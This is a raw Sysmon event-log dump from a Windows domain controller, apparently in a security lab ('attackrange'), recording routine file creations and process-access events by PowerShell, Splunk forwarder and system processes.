12:06:09.765{266CAFBE-65AB-6064-5001-00000000AE01}2456ATTACKRANGE\AdministratorC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_3fsdzld1.lr2.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009981Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:09.765{266CAFBE-65AB-6064-5001-00000000AE01}2456ATTACKRANGE\AdministratorC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_m5ah5s10.3mx.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009980Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:09.687{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7AE99815B1104DEA440A806BB012F5B,SHA256=FF6D51CD97B66B97A8057A2A8187C14C98684BDE7320EB2C747921B1C1AA61A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009979Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:09.655{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D35DFD6735964D8C7C64CB1F96255CBA,SHA256=CD9EDF7431E2ADC1ABAA4270374627C54A88CD384CF5E1188F6EC95D96149451,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009978Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:09.593{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-65B1-6064-5601-00000000AE01}3224C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009977Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:09.593{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009976Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:09.593{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009975Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:09.593{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009974Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:09.593{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009973Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:09.593{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-65B1-6064-5601-00000000AE01}3224C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009972Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:09.593{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-65B1-6064-5601-00000000AE01}3224C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009971Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:09.453{266CAFBE-65B1-6064-5601-00000000AE01}3224C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009970Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:09.468{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000009969Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:09.468{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000009968Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:09.468{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000009967Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:09.468{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000009966Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:09.468{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000009965Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:09.468{266CAFBE-64C4-6064-9C00-00000000AE01}46201988C:\Windows\system32\sihost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009964Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:09.296{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000009963Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:09.296{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000009962Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:09.296{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000009985Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:10.936{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7C421B046C99FEE56DFA8859C5F8EE35,SHA256=1D7BFDB4A4C8E87B441A4D23EF9E4AC1679F7DAD16AC9D481737D083C93476EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009984Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:10.686{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89D0ABC298DB6861421A0CF5D899CD7D,SHA256=A29BE379EDAC53D6079F01C07DACFB74A11D932F41B360BBCF493603DB9AC968,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009988Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:11.702{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58777DE40996C4F8E9E5FD9D9CE7FEC5,SHA256=4BFA050FB8FED8C426D7A83D8E5AAD2D1C6B9F0B595FB085C3A14C098613905D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009987Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:11.030{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009986Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 